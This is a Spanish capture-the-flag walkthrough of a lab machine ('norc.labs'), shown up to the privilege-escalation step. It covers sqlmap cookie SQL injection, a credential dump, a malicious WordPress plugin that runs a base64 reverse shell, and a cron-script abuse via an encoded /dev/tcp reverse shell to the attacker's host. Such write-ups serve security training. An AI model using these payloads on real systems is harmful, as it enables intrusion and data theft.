Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-18 10:30 EST
Nmap scan report for 172.17.0.2
Host is up (0.000035s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 8c:5c:7b:fe:79:92:7a:f9:85:ec:a5:b9:27:25:db:85 (ECDSA)
|_ 256 ba:69:95:e3:df:7e:42:ec:69:ed:74:9e:6b:f6:9a:06 (ED25519)
80/tcp open http Apache httpd 2.4.59 ((Debian))
|_http-title: Did not follow redirect to http://norc.labs/?password-protected=login&redirect_to=http%3A%2F%2F172.17.0.2%2F
|_http-server-header: Apache/2.4.59 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.61 seconds
Si nos conectamos a la pagina, no cargara, veremos en la URL que esta intentando acceder mediante un dominio llamado norc.labs por lo que vamos a registrarlo:
nano /etc/hosts
#Dentro del nano
<IP> norc.labs
Lo guardamos y ahora vamos acceder a el de nuevo, veremos que si carga y veremos que de primeras nos aparece un panel en el que meter una password.
Pero si inspeccionamos el codigo, vemos esta seccion de aqui:
Sobre todo donde pone wp-submit podemos ver que esta utilizando wp por lo que podemos deducir que tiene un wordpress instalado, vamos a probar metiendo lo siguiente:
URL = http://norc.labs/wp-admin
Y vemos que efectivamente nos lleva al panel de wordpress de login, probaremos con las credenciales por defecto.
Pero veremos que no funcionan, tambien veremos que tenemos solamente 3 intentos, por lo que no podremos realizar fuerza bruta, vamos a identificar si hubiera algun plugin en el wordpress, que pueda ser vulnerable.
Vamos a realizar un poco de fuzzing ya que no podremos utilizar la herramienta wpscan.
Gobuster
gobuster dir -u http://norc.labs/ -w <WORDLIST> -t 100 -k -r
___
__H__
___ ___[.]_____ ___ ___ {1.8.11#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:09:22 /2025-01-18/
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q]
[11:09:24] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[11:09:24] [WARNING] provided value for parameter 'wordpress_logged_in' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[11:09:24] [INFO] testing connection to the target URL
got a 302 redirect to 'http://norc.labs'. Do you want to follow? [Y/n]
[11:09:25] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:09:25] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n]
[11:09:26] [WARNING] please consider usage of tamper scripts (option '--tamper')
[11:09:26] [INFO] testing if the target URL content is stable
[11:09:27] [WARNING] (custom) HEADER parameter 'Cookie #1*' does not appear to be dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n]
[11:09:29] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might not be injectable
[11:09:29] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*'
[11:09:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:09:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[11:09:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[11:09:32] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:09:32] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[11:09:32] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[11:09:32] [INFO] testing 'Generic inline queries'
[11:09:32] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:09:34] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[11:09:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:09:35] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:09:36] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:09:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:09:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:09:38] [INFO] testing 'MySQL inline queries'
[11:09:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:09:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:10:10] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n]
[11:10:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:10:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:10:14] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[11:10:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:10:19] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[11:10:21] [INFO] checking if the injection point on (custom) HEADER parameter 'Cookie #1*' is a false positive
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 205 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: wordpress_logged_in=" AND (SELECT 9724 FROM (SELECT(SLEEP(5)))IDCZ) AND "NyJG"="NyJG
---
[11:11:40] [INFO] the back-end DBMS is MySQL
[11:11:40] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
web server operating system: Linux Debian
web application technology: Apache 2.4.59
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[11:11:56] [INFO] enumerating database management system schema
[11:11:56] [INFO] fetching database names
[11:11:56] [INFO] fetching number of databases
[11:11:56] [INFO] retrieved:
[11:12:27] [INFO] adjusting time delay to 1 second due to good response times
2
[11:12:27] [INFO] retrieved: information_schema
[11:15:33] [INFO] retrieved: wordpress
[11:17:14] [INFO] fetching tables for databases: 'information_schema, wordpress'
[11:17:14] [INFO] fetching number of tables for database 'information_schema'
[11:17:14] [INFO] retrieved: 79
[11:17:30] [INFO] retrieved: ALL_PLUGINS
[11:19:35] [INFO] retrieved: APPLICABLE_ROLES
[11:22:16] [INFO] retrieved: CHARACTER_SETS
[11:24:26] [INFO] retrieved: CHECK_CONSTRAINTS
[11:27:04] [INFO] retrieved: COLLATIONS
[11:28:46] [INFO] retrieved: COLLATION_CHA^C
[11:30:01] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 1 times
Vemos que tiene 79 tablas, por lo que seria una locura esperar todo eso, vamos a ir al grano ya que nos interesa la base de datos de Wordpress, por lo que vamos a utilizar la base de datos por defecto a ver si cuela:
___
__H__
___ ___[.]_____ ___ ___ {1.8.11#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:31:46 /2025-01-18/
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
[11:31:46] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[11:31:46] [WARNING] provided value for parameter 'wordpress_logged_in' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[11:31:46] [INFO] testing connection to the target URL
got a 302 redirect to 'http://norc.labs'. Do you want to follow? [Y/n] Y
[11:31:46] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: wordpress_logged_in=" AND (SELECT 9724 FROM (SELECT(SLEEP(5)))IDCZ) AND "NyJG"="NyJG
---
[11:31:46] [INFO] testing MySQL
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[11:32:05] [INFO] confirming MySQL
[11:32:05] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[11:32:35] [INFO] adjusting time delay to 1 second due to good response times
[11:32:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.59
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[11:32:35] [INFO] fetching columns for table 'wp_users' in database 'wordpress'
[11:32:35] [INFO] retrieved: 10
[11:32:46] [INFO] retrieved: ID
[11:33:03] [INFO] retrieved: user_login
[11:35:00] [INFO] retrieved: user_pass
[11:36:41] [INFO] retrieved: user_nicename
[11:38:50] [INFO] retrieved: user_email
[11:40:32] [INFO] retrieved: user_url
[11:42:06] [INFO] retrieved: user_registered
[11:44:37] [INFO] retrieved: user_activation_key
[11:47:59] [INFO] retrieved: user_status
[11:50:00] [INFO] retrieved: display_name
[11:52:08] [INFO] fetching entries for table 'wp_users' in database 'wordpress'
[11:52:08] [INFO] fetching number of entries for table 'wp_users' in database 'wordpress'
[11:52:08] [INFO] retrieved: 1
[11:52:12] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
1
[11:52:22] [INFO] retrieved: admin
[11:53:08] [INFO] retrieved:
[11:53:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:53:09] [INFO] retrieved: admin@oledockers.norc.labs
[11:57:40] [INFO] retrieved: admin
[11:58:26] [INFO] retrieved: admin
[11:59:13] [INFO] retrieved: $P$BeNShJ/iBpuokTEP2/94.sLS8ejRo6.
[12:06:42] [INFO] retrieved: 2024-07-01 18:07:01
[12:10:17] [INFO] retrieved: 0
[12:10:33] [INFO] retrieved: http://norc.labs
[12:13:44] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[12:13:44] [INFO] using hash method 'phpass_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/smalldict.txt' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[12:13:44] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[12:13:44] [INFO] starting dictionary-based cracking (phpass_passwd)
[12:13:44] [INFO] starting 8 processes
[12:13:52] [WARNING] no clear password(s) found
Database: wordpress
Table: wp_users
[1 entry]
+----+------------------+------------------------------------+----------------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
+----+------------------+------------------------------------+----------------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1 | http://norc.labs | $P$BeNShJ/iBpuokTEP2/94.sLS8ejRo6. | admin@oledockers.norc.labs | admin | 0 | admin | admin | 2024-07-01 18:07:01 | <blank> |
+----+------------------+------------------------------------+----------------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
[12:13:52] [INFO] table 'wordpress.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/norc.labs/dump/wordpress/wp_users.csv'
[12:13:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/norc.labs'
[*] ending @ 12:13:52 /2025-01-18/
Vemos que ha funcionado, a parte tambien veremos la informacion de la base de datos de wordpress viendo unas credenciales tambien, las cuales probaremos en el propio login.
Si nosotros intentamos crackear ese hashMD5 veremos que no podemos, pero nos fijamos en que obtuvimos esta informacion de aqui admin@oledockers.norc.labs parece ser que hay un subdominio, por lo que veremos que contiene de la siguiente forma:
nano /etc/hosts
#Dentro del nano
<IP> norc.labs oledockers.norc.labs
Lo guardamos y ahora nos vamos a esa parte del subdominio.
URL = http://oledockers.norc.labs/
Veremos lo siguiente cuando entremos:
Inbox
----------------------------------------------------------------------------------
From: admin@oledockers.norc.labs
Subject: Password Reminder
Hi, this is just in case I forget my password -> admin:wWZvgxRz3jMBQ ZN <--
----------------------------------------------------------------------------------
Vemos que la password del usuario admin es wWZvgxRz3jMBQ ZN por lo que probaremos a entrar desde el panel de wordpress con dichas credenciales.
Escalate user www-data
User: admin
Pass: wWZvgxRz3jMBQ ZN
Vemos que si nos deja y estaremos dentro del Wordpress en el panel de administrador.
Crearemos nosotros un plugin de wordpress con una reverse shell dentro del ella, de la siguiente forma:
nano plugin.php
#Dentro del nano
<?php
/*
Plugin Name: HACKEADO
Description: Plugin para ejecutar comandos del sistema a través de la URL (solo en entorno controlado).
Version: 66666666.0
Author: d1se0
*/
?>
<?php
system("echo 'Base64ReverShell' | tee /tmp/shell; base64 -d /tmp/shell | bash");
?>
zip plugin.zip plugin.php
Nos vamos a Plugins -> Añadir nuevo plugin -> Subir Plugin -> Dentro de esta seccion le daremos a Browser... para seleccionar nuestro plugin malicioso.
Una vez seleccionado y subido, le daremos a Instalar ahora, despues le damos otra vez a plugins y nos aparecera el nuestro, antes de activarlo estaremos a la escucha:
nc -lvnp <PORT>
Y ahora si le daremos al boton Activar y volvemos a la escucha, veremos lo siguiente:
listening on [any] 7777 ...
connect to [192.168.5.186] from (UNKNOWN) [172.17.0.2] 54120
bash: cannot set terminal process group (30): Inappropriate ioctl for device
bash: no job control in this shell
www-data@c103b3df70e5:/var/www/norc.labs/wp-admin$ whoami
whoami
www-data
Sanitización de shell (TTY)
script /dev/null -c bash
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>
Escalate user kvzlx
Si nos vamos a la home de kvzlx veremos un archivo bastante interesante llamado .cron_script.sh que si lo leemos veremos lo siguiente:
Vemos que esta decodificando su propia password en /tmp sin ningun tipo de sanitizacion, pero si nos vamos a la carpeta /tmp, veremos el archivo decoded.txt pero si lo leemos no lleva nada dentro, por lo que algo no esta ejecutando bien.
Tambien podemos observar que puede ser que se este ejeuctando un crontab cada cierto tiempo sobre ese archivo, vamos a investigar mas en los procesos a ver que esta pasando.
Si hacemos ps -aux no veremos mucho mas, por lo que utilizaremos la herramienta pspy64 que nos ayudara a todo esto, para ver de mejor forma que esta pasando de forma interna.
En nuestro host nos descargaremos la herramienta:
Una vez que la tengamos en nuestro host abriremos un servidor de python3 para pasarnos el archivo a la maquina victima:
python3 -m http.server
Y en la maquina victima haremos lo siguiente:
cd /tmp
wget http://<IP>:8000/pspy64
Una vez que nos lo hayamos pasado, le pondremos permisos de ejecuccion de la siguiente forma:
Vemos que esta intentando leer el archivo .wp-encrypted.txt, vamos a ver que hay en dicho archivo.
Pero si entramos vemos que no hay ningun archivo, podemos nosotros crear el archivo, ya que no se esta aplicando ningun tipo de sanitizacion, lo que va hacer es que va a decodificar el base64 que nosotros le metamos al archivo y lo va a ejecutar, por lo que haremos lo siguiente:
Nos vamos a nuestro host y codificamos la reverse shell en base64:
Ahora en la maquina victima, pondremos lo siguiente:
nano /var/www/html/.wp-encrypted.txt
#Dentro del nano
L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC41LjE4Ni83NzU1IDA+JjEnCg==
Lo guardamos y seguidamente nos pondremos a la escucha en nuestro host:
nc -lvnp <PORT>
Solo tendremos que esperar un ratito y veremos lo siguiente en la escucha:
listening on [any] 7755 ...
connect to [192.168.5.186] from (UNKNOWN) [172.17.0.2] 48630
bash: cannot set terminal process group (945): Inappropriate ioctl for device
bash: no job control in this shell
kvzlx@c103b3df70e5:~$ whoami
whoami
kvzlx
Vemos que ya somos el usuario kvzlx.
Sanitización de shell (TTY)
script /dev/null -c bash
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>
Escalate Privileges
Si vemos las capabilities que tiene el usuario, veremos lo siguiente:
